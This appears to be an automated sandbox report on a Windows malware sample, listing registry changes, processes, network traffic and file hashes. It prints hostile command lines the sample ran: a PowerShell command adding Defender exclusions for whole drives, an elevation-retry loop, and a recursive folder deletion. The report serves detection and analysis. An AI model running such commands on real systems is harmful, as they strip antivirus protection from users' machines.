| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/3176-0-0x00000000048E0000-0x0000000004916000-memory.dmp
memory/3176-1-0x0000000072E90000-0x0000000073640000-memory.dmp
memory/3176-3-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3176-2-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3176-4-0x0000000005070000-0x0000000005698000-memory.dmp
memory/3176-5-0x0000000004EF0000-0x0000000004F12000-memory.dmp
memory/3176-6-0x0000000005810000-0x0000000005876000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfh3qv3j.jxx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3176-12-0x0000000005880000-0x00000000058E6000-memory.dmp
memory/3176-17-0x0000000005A80000-0x0000000005DD4000-memory.dmp
memory/3176-18-0x0000000005E90000-0x0000000005EAE000-memory.dmp
memory/3176-19-0x0000000005F50000-0x0000000005F9C000-memory.dmp
memory/3176-20-0x0000000006E70000-0x0000000006F06000-memory.dmp
memory/3176-21-0x00000000063B0000-0x00000000063CA000-memory.dmp
memory/3176-22-0x0000000006400000-0x0000000006422000-memory.dmp
memory/3176-23-0x0000000007500000-0x0000000007AA4000-memory.dmp
memory/4944-24-0x0000000072E90000-0x0000000073640000-memory.dmp
memory/4944-25-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4944-35-0x000000007F180000-0x000000007F190000-memory.dmp
memory/4944-36-0x0000000006E90000-0x0000000006EC2000-memory.dmp
memory/4944-37-0x000000006F7D0000-0x000000006F81C000-memory.dmp
memory/4944-47-0x0000000006ED0000-0x0000000006EEE000-memory.dmp
memory/4944-48-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4944-50-0x0000000006EF0000-0x0000000006F93000-memory.dmp
memory/4944-49-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4944-51-0x0000000007680000-0x0000000007CFA000-memory.dmp
memory/4944-52-0x00000000070A0000-0x00000000070AA000-memory.dmp
memory/4944-53-0x0000000007230000-0x0000000007241000-memory.dmp
memory/4944-54-0x0000000007260000-0x000000000726E000-memory.dmp
memory/4944-55-0x0000000007270000-0x0000000007284000-memory.dmp
memory/4944-56-0x00000000072B0000-0x00000000072CA000-memory.dmp
memory/4944-57-0x00000000072A0000-0x00000000072A8000-memory.dmp
memory/4944-60-0x0000000072E90000-0x0000000073640000-memory.dmp
memory/3176-61-0x0000000072E90000-0x0000000073640000-memory.dmp
memory/3176-62-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3176-64-0x0000000004A30000-0x0000000004A40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f7b00a2f9d88090175e4d5813473a969 |
| SHA1 | 2f84115c729095a86dc210459cf1f1ae66df9e24 |
| SHA256 | b42e656e842838b1e7140cf15d63ae73a06272f11b0ad4ead0ce8c58ff844fef |
| SHA512 | 5dc723cb8dab94ab7fcb9be43a641684461e112087b808f0ee00786467c3f85420dc85cd2044a77bc6017ec9caa67809cada0dfe0a06f8c19312b1726a57f96d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
memory/3176-68-0x0000000072E90000-0x0000000073640000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:22
Platform
win10v2004-20240226-en
Max time kernel
1714s
Max time network
1162s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4044 -ip 4044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 3128
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:27
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1897s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3444 wrote to memory of 2508 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 3444 wrote to memory of 2508 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3444 -s 328
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1760s
Max time network
1782s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x31c
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
